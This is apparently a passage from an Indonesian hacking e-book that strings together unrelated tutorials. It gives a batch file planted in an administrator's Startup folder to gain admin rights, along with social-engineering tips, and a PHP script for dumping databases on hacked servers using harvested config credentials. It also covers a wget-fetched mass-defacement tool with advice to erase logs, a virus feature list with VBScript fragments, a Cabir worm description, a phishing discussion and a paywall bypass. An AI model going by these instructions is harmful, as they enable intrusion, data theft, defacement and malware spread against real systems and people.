@echo off
net localgroup Administrators RISKI /add
exit
----------------------------------end-----------------------------
2. Yang kedua ini adalah bagian yang paling penting yaitu menaruh file ini agar di exekusi
oleh sang admin, karena perintah ini dapat berjalan dengan sempurna hanya oleh sang
dewa, tenaaanggg!!! Sebentar lagi kita akan mempunya POWER yang sama dengan si doi
sang Admin yang PeLiT he..h.e…he…he..
Karena kita di izinkan untuk menjelajah kemana saja pada file system ini, maka sisipkan
admin.bat pada direktori startUp administrator pada alamat berikut ;
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
Nah betul sekali dugaan anak gaul sekalian, jadi program itu akan segera di eksekusi secara
otomatis begitu sang admin login dengan accountnya, maka seketika itu account RISKI yang
cuma punya pangkat Power User maka pada saat itu juga RISKI sekaligus mempunya 2
pangkat, yaitu Power User dan Adminsitrators he…he…. Ketika kita menjadi sang Maha
Dewa, you know what should you do next! ?
FYI, jika kita belum terdaftar pada local account (ketika kita cek dengan net user ternyata
tidak ada user name kita waktu login) maka script batch filenya kita rubah sedikit dengan
tambahan mendaftarkan username kita kedalam local account, baru setelah itu bisa kita
naikkan pangkatnya menjadi Administrators, modifikasinya adalah sebagai berikut:
-----------------------------------start---------------------------------
@echo off
net user user_name_kamu /add
net localgroup Administrator user_name_kamu /add
exit
------------------------------------end---------------------------------
Nah setelah semuanya siap lakukan lah hal yang telah di jelaskan pada langkah kedua, maka
kita hanya cuma menunggu sang admin login dengan account adminsitratornya, (waduh
kapan nih si doi login dan kemakan perangkap gue?.... bisa botak nih nunggunya!) saran gue
sih cuma 1 do it the Social Engineering dwonk!! Masak gitu aja bingung? Pancing si admin
supaya dia login di profile adminya, sepengalaman gue sih kalo kita ada kerusakan atau
masalah kecil si IT Helpdesk login admin dulu untuk ngecek segala sesuatunya, maklum kalo
login di user biasa serba terbatas hi…hi…hi..hi… jadi dari modal pengalam gue mudah
mudahan muncul ide ide social engineering yang lebih oke biar si admin kena jebakan kita…
dan kalo udah berhasil jangan melakukan hal2 yang destruktif dan merugikan orang lain yang
instal AAtolls buat scaning PC si admin wakakakkakak…… atau instal Trojan Client di situ
yang nanti servernya di kirim via network atau email ke admin! Duh berdosalah aku kalo gitu
yang turut membantu niat jelekmu!
Artikel ringan ini cuma buat para newbies aja yang kesel sama tindakan admin yang semena
mena dan tidak adil, setidaknya ada beberapa pelajaran yang dapat di petik walaupun
sesederhana apapun, mudahan dapat menjadi pelajaran yang berharaga. Berikut ini
pencegahan yang perlu di lakukan:
1. Enkripsi NTFS lebih baik dari pada FAT32 terutama untuk sekurity dan manajemen file. (oh
iya!.. walaupun pake NTFS kita bisa manfaatin autoexec.bat lhoo… untuk eksekusi file
admin.bat tadi he..he..he… No Perfect System In The World Man!! )
3. Password BIOS, dan set boot sequence hanya dari hardiks saja, ini mencegah user tidak
bisa booting dengan device lain, karena banyak program bertebaran untuk mereset password
sang mahadewa, salah satu contohnya dengan Offline NT Password Recovery. (kecuali user
nekad banged mencopot baterai CMOS dengan membongkar PC, gile usaha banged dah!!!)
4. Untuk sang admin, sering sering di cek donk kalo ke usernya, kalo udah kecolongan
cepet2 di turunin lagi tuh pangkatnya, dan yang sering banget kejadian nih buat temen2 gue
kalo login admin, DI LOG OUT DONK!!!!!! jangan ditinggal gitu aza!
Saat berhasil menyusup ke sebuah server web, sangat jarang hacker yang berusaha untuk
mengintip data apa saja yang ada di databse server (pengalaman saya saat chatting di
dalnet). Mungkin disebabkan karena mereka tidak bisa menjalankan phpmyadmin, karena
selama ini phpmyadmin yang saya sisipkan ke salah satu situs, tidak pernah berhasil
berjalan.
Nah... dari hal-hal di atas, akhirnya saya menulis script php berikut ini
-----------------------------------------start di sini-----------------------------------------
<table border=1><tr>
<td valign=top><B>TABEL</B><HR>
<?php
$result = mysql_list_tables ("$db");
$i = 0;
while ($i < mysql_num_rows($result)) {
$tb_names[$i] = mysql_tablename ($result, $i);
echo $tb_names[$i] . "<BR>";
$i++;
}
?>
</table><br><b>DATA<b><br>
<table bordercolor=blue border=1>
<?
$fields = mysql_list_fields("$db", "$tb", $con);
$columns = mysql_num_fields($fields);
echo "<tr><th>";
for ($i = 0; $i < $columns; $i++) {
echo mysql_field_name($fields, $i) . "<th>";;
}
echo "</tr>"
?>
<tr>
<?php
$perintah="select * from $tb";
$tampil_data=mysql_query($perintah);
while($data=mysql_fetch_row($tampil_data))
{echo("<tr><td>$data[0]<td>$data[1]<td>$data[2]<td>$data[3]<td>$data[4]<td>$d
ata[5]<td>$data[6]<td>$data[7]<td>$data[8]<td>$data[9]<td>$data[10]<td>$data[1
1]<td>$data[12]<td>$data[13]<td>$data[14]<td>$data[15]<td>$data[16]<td>$data[
17]<td>$data[18]<td>$data[19]<td>$data[20]<td>$data[21]<td>$data[22]<td>$data
[23]<td>$data[24]<td>$data[25]<td>$data[26]<td>$data[27]<td>$data[28]<td>$dat
a[29]<td>$data[30]<td>$data[31]<td>$data[32]<td>$data[33]<td>$data[34]<td>$da
ta[35]</tr>");
}
?>
-----------------------------------------potong di sini-----------------------------------------
Lalu darimana mendapatkan mendapatkan nama user, password dan nama databasenya
????
Hehehe, ini memang perlu sedikit ketelitian dan kesabaran. Sebagai contoh kita bisa melihat
isi file config.php milik PHPBB :
$dbhost = 'localhost';
$dbname = 'phpbb';
$dbuser = '';
$dbpasswd = '';
Selanjutnya tinggal meng-edit file diatas dengan data yang didapat dari config.php tadi,
simpan di hosting gratisan kamu and then wget dari server yang berhasil disusupi.
Jangan lupa untuk menambahkan option tb=nama_tabel pada saat mengaksesnya
22. Phising Friendster
Phising artinya hampir sama dengan fishing(memancing), dimana dalam hal ini tidak
memancing ikan, tetapi memancing informasi personal, yaitu dengan cara mengirimkan email
dengan memalsukan alamat pengirim, contohnya dengan menggunakan perusahaan eBay,
PayPal dan dalam kasus ini Friendster tentunya. Email tersebut akan meminta anda untuk
mengirimkan informasi personal seperti frist name, last name, alamat, nomor credit card dll.
Jadi singkat kata dalam bahasa Indonesia adalah "email penipu" atau dalam kasus di artikel
ini adalah penipu yang meminta informasi anda.
Ketika kita menyetujui Term of Service (ToS*) mereka saat pertama sign up maka kita
dianggap sudah menyetujuinya dan telah membaca Privacy Policy
(Privacy*) mereka. ada yg aneh dalam privacy mereka yaitu pada point Use of Information
Obtained by Friendster, terutama pada sub Information that users do not submit to us. isinya
adalah We use your server, IP address, and browser-type related information in the general
administration of our website.
Apakah cuma sampai di sini saja 'aksi' mereka? aku tidak tahu. karena aku tak cukup pintar
untuk menyelidiki 'aksi' mereka terhadap sistem yg terkoneksi saat kita log in.
Phising
coba klik fasilitas mereka pada link invite
(http://www.friendster.com/invite.php?statpos=headernav).
ternyata ada fasilitas Import Email Addresses. hmmm..
menarik bukan? fasilitas ini memudahkan user dalam memanagej accountnya di FS bagi
mereka yg kebetulan menggunakan Yahoo!mail ato Hotmail sebagai username.
INI ADALAH TRIK DASAR PHISING. fasilitas yg menarik dan bagus. yaitu daftar alamat
email yg tersimpan dalam account email kita di yahoo!mail ato hotmail dapat dipindahkan ke
dalam account FS kita dengan melakukan import. coba kita klik, ternyata kita diharuskan
mengisi username dan password email kita.
FS sudah tahu username dan password email kita. apa yg dapat mereka lakukan?
Import addresses from your Yahoo! address book. Fill in your username and password and
click "Import" to view your list of contacts. Friendster will not store your Yahoo password.
(itu kata mereka) percayakah kita? who's know in cyberworld, gitu loh?
so, semakin tinggi kepentingan kita menggunakan email.. maka semakin rawan informasi yg
ada di dalamnya. (bisa aja berisi email tentang autentifikasi kartu kredit, rekening bank, polis
asuransi, nomor jaminan, register paypal, dsb).
Saran
1. jangan menggunakan beberapa fasilitas di FS yg dapat membuat FS mendapat akses
terhadap account email kita.
2. hindari pemakaian password yg sama di beberapa account yg berbeda, termasuk account
FS.
3. gunakan email khusus untuk register di FS. kalo masih pake email primary kita, segera
bikin email baru, lalu ganti email di FS dengan email baru tersebut.
Publikasi
aku sudah mempublikasikan kegiatan phising ini dalam bulletin board (fasilitas FS) untuk
memperingatkan temen2ku. dan dalam hitungan jam, accountku dihapus.
semua posting bulletinku dihapus. emailku diblok.
hebat sekali mereka. padahal aku menggunakan bahasa indonesia.
URL
http://www.friendster.com/emailimport/yahoo/yimport.php
http://www.friendster.com/emailimport/hotmail/hotimport.php
23. Deface
Di sini saya memberikan Sebuah Program Yang dapat berjalan Sendiri Mencari targetNya
Sewaktu Saya Berada Di sebuah Server Saya Melihat banyak sekali www/root yang berada
Di sana sampai 100 www/root di sana , Kalau Saya copy paste ke semua www/root tersebut
pasti deh banyak Memakan Waktu, Biaya ( Biaya Internet Donk ) dan Tenaga.
Setelah saya berfikir, Kenapa harus Copy dan paste Secara manual , Buat saja Program
yang Dapat mengerjakan Hal tersebut, Kita Hanya Nunggu Sambilan Minum kopi atau susu
coklat :D Akhrinya Saya membuat tools ini,
ada pun cara kerja tools saya ini adalah mencari "SASArAN" file index.html, index.php ,
main.php, Saja
1. Sediakan cemilannya SilVer Queen dan Untuk minumnya Kopi atau Susu coklat ( cuma
Saya Sarani ajah )
2. Buka Shell anda Dan Login sebagai root ( tools ini hanya dapat di jalankan oleh root,
karena root mempunyai akses unlimited kesemua Tempat )
3. wget http://geocities.com/medan_hack1/tools/deface.tar.gz
4. tar -zxvf deface.tar.gz
5. Anda harus menyediakan file index.html
( yang harus berada tempatNya bersamaan dengan file deface, Dan file index.html berisi
PEsan Deface kamu :P )
6. Gunakan ./deface tunggu beberapa saat ( Anda Dapat Minum Kopi atau Susu Coklat )
7. Setelah Selesai hapus Semua Log anda Agar Tidak ketahuan :P
Semua Directory Yang mempunyai file index.html, index.php , main.php tadi akan di ganti file
index.html Kamu.
So Happy deface deh
Disclaimer:
Saya tak bertanggung jawab atas kerugian atau kerusakan yang diakibatkan oleh
artikel/source code ini. Artikel ini semata-mata hanya untuk pembelajaran.
Anda bebas memakai, mengembangkan dan menggunakan source code ini selama
menyertakan
copyleftnya. Untuk saran, komentar dan informasi silahkan kirim ke : em@ilku.net
Infection:
-menginfeksi file² htm,html,htt,asp dan php
-mengkloning file² wav,midi,mpg,mpeg,jpg dan bmp
-meng 'overwrite' file² doc,xls,ppt,mdb,rtf dan txt
-win.ini dan system.ini
-autoexec.bat dan winstart.bat
-regedit
Features:
-Mengubah ekstensi AntiVirus menjadi *.Mella
-Keamanan berlapis(regedit,win.ini,system.ini,autoexec.bat,winstart.bat,shortcut,menu)
-Enkripsi
Payload:
-jika tanggal sekarang=13 bulan sekarang=3
-menampilkan pesan
-mendisable regedit,display control panel,shutdown,dos,drive,desktop
dll
Greetz:
[K]alamar -thank's for ur tut
crayolarx -ur vir inspire me
kefi -ur html/vbs vir is ok
alcopaul -nice virus man
sevenC -kemana aja loe, masa sampe sini aja...
iwing -kok situsnya sering suspended mas..
d-e-n-i,adhe,kesepian,joehunt,rinal -my best friend's on the real
life n on the net ;-)
phatygeni,khepri` -alo senior... bapadian se adiak² ma..
mayat,obor-jp -dree bilo ka payokumbuah? pakreno maa mp3
player
wak
ob|wan -da.. ;)
vuem -gimana kabarnya bro?
jejeng -pak guru.. hehehehe..
adriyanto,wira -mokasi komputernyo
Dim
Mella,Mela,Wella,Andalusia,DirektoriWindows,DirektoriSystem,DirektoriTemp,KodeVbs,Kode
Htm,Chat,Drives,Drive,Folder,Files,File,Subfolders,Subfolder
'harus ada kalau tidak virus kamu akan berhenti bila terjadi error
'deklarasi global
'membuat objek file system dengan nama Mella
'set folder C:\Windows untuk Win9x, C:\WinNT untuk WinNT tergantung jenis Windows
Set DirektoriWindows = Mella.GetSpecialFolder(0)
Cabir replicates over bluetooth connections and arrives to phone messaging inbox as
caribe.sis file what contains the worm. When user clicks the caribe.sis and chooses to install
the Caribe.sis file the worm activates and starts looking for new devices to infect over
bluetooth.
When Cabir worm finds another bluetooth device it willstart sending infected SIS files to it,
and lock to that phone so that it won't look other phones even when the target moves out of
range.
Please note that Cabir worm can reach only mobile phones that support bluetooth, and are in
discoverable mode.
Setting you phone into non-discoverable (hidden) Bluetooth mode will protect your phone
from Cabir worm.
But once the phone is infected it will try to infect other systems even as user tries to disable
bluetooth from system settings.
When user clicks on the caribe.sis in phone messaging inbox the phone will display a warning
dialog
If user clicks yes the phone will ask normal installation question
If user clicks yes the Cabir worm will activate and show a dialog that contains the name that
virus author wants to give to the worm and the authors initialias and group initial 29A.
Although it seems that in some phone models, for example Nokia 6600 this dialog is not
shown.
Disinfection
Disinfection
http://www.f-secure.com/tools/f-cabir.sis
http://www.f-secure.com/tools/f-cabir.zip
Alternatively, you can disinfect the system manually by installing a file manager application
and manually deleting these files:
c:\system\apps\caribe\caribe.rsc
c:\system\apps\caribe\caribe.app
c:\system\apps\caribe\flo.mdl
c:\system\recogs\flo.mdl
c:\system\symbiansecuredata\caribesecuritymanager\caribe.app
c:\system\symbiansecuredata\caribesecuritymanager\caribe.rsc
Detailed Description
Replication
Cabir replicates over bluetooth in caribe.sis file that contains the worm main executable
caribe.app, system recognizer flo.mdl and resource file caribe.rsc. The SIS file contains
autostart settings that will automatically execute caribe.app after the SIS file is being installed.
The caribe.sis file will not arrive automatically to the target device, so user needs to answer
yes to the transfer question while the infected device is still in range.
When the Cabir worm is activated it will start looking for other bluetooth devices, and starts
sending infected caribe.sis files to the first device it finds. The replication routine in Cabir
contains a bug that causes it to lock to first device it finds and it won't look for other devices.
This means that Cabir is capable of sending infected files to only one other device per
activation. So Cabir will try to infect one other device when it is activated the first time, and
then one more each time when the phone is rebooted.
Also in our tests we found that the newly infected phone will first look for the phone that sent
the infected file. So Cabir is capable of spreading widely only in cases where the phone that
sent the infected file is out of range before user activates the Cabir in a new phone.
Which means, that while Cabir is capable of spreading in the wild, it would spread quite slowly
and would not cause large epidemic.
One curious fact is that in series 60 phones the bluetooth functionality is independent from the
GSM side, and if phone is rebooted the cabir will try to spread even if user doesn't enter PIN
code.
Infection
When the caribe.sis file is installed the installer will copy the worm executables into following
locations:
c:\system\apps\caribe\caribe.rsc
c:\system\apps\caribe\caribe.app
c:\system\apps\caribe\flo.mdl
This is most likely done in case user installs the application to memory card.
Then the worm will recreate the caribe.sis file from worm component files and data blocks that
are in caribe.app.
After recreating the caribe.sis file the worm starts to look for all visible bluetooth devices and
send the SIS file to them.
Detection
Detection for this malware was published on June 15th, 2004 in the following F-Secure Anti-
Virus updates:
[FSAV_Database_Version]
Version=2004-06-15_01
Detection for F-Secure Anti-Virus for Symbian series 60 has been published at 11:55 on June
15th, 2004 in database build number 7.
25. DOWNLOAD WALLPAPER DI SITUS
GAME
Situs Gamewallpaper menyediakan wallpaper yang sangat menarik, hanya sayang sekali
banyak sekali pembatasan-pembatasan yang dilakukan disitu.
Kita hanya membutuhkan dua Browser Internet utk menjalankan triks tersebut
diatas,yaitu Internet Explorer browser dan browser Opera (kalo bisa yang paling
baru).Memang bisa menggunakan salah satu saja diantara dua browser tersebut akan tetepi
bagi yang masih awam akan mengalami kesusahan didalam menjalankan triks ini.Langsung
saja,kita buka www.gamewallpaper.com menggunakan Internet Explorer (disarankan),kita
lihat pada priview di www.gamewallpaper.com ada yang wallpaper yang gratisan ada yang
bayar,pertama kita akan membuka wallpaper yang gratisan dulu,normalnya kita hanya
diperbolehkan mengambil/membuka 5 wallpaper saja,tetepi kita akan membuka semuanya
tanpa dibatasi.
Sebelumnya saya akan menerangkan sedikit tentang stuktur direktori yang ada di
www.gamewallpaper.com,semua wallpaper di situs ini semunya disimpan di
www.gamewallpaper.com/wallpapers, akan tetepi kita tidak diperbolehkan masuk kesana,
wallpaper yang dapat kita buka disini memiliki resolusi yang bervarisi dari resolusi
800x600 pixel sampai 1600x1200 pixel.Lansung saja!!!!!!!!!!!!!!!!Pertama,klik kanan pada
bagian priview wallpaper yang kita inginkan lalu pilih properties.(saya malas menjelaskannya)
Drag source javascript yang ada paling atas di tampilan properties,contohnya kalo mau
ngambil wallpaper stuntman akan terlihat pada properties bagian paling atas adalah
“wallpaper_stuntman_02.jpg” setelah source javascript tersebut di drag(Tahan mouse kiri)
langsung saja klik kanan lagi lalu pilih copy atau Ctrl+C.lalu kita gabungkan dgn source
javascript www.gamewallpaper.com/wallpapers maka hasilnya akan menjadi
www.gamewallpaper.com/wallpapers/wallpaper_stuntman_02.jpg .kita lihat bahwa source
javascript ini belum lengkap yaitu resolusi dari wallpaper,masukkan angka ini:
a)_800(800x600)
b)_1024(1024x768)
c)_1152(1152x864),
d)_1280(1280x960)
e)_1280x1024(1280x960)
f)_1600(1600x1200)
Oh ya,dari sejumlah wallpaper yang berbayar(yang tidak gratisan) ada beberapa yang
bisa dibuka,diantaranya adalah
1)NFSU 2
2)Midnight Club 2
3)World Of WarCraft
4)Spy Hunter 2
5)Age Of Wonder:Shadow Magic
6)Project Ghotam Racing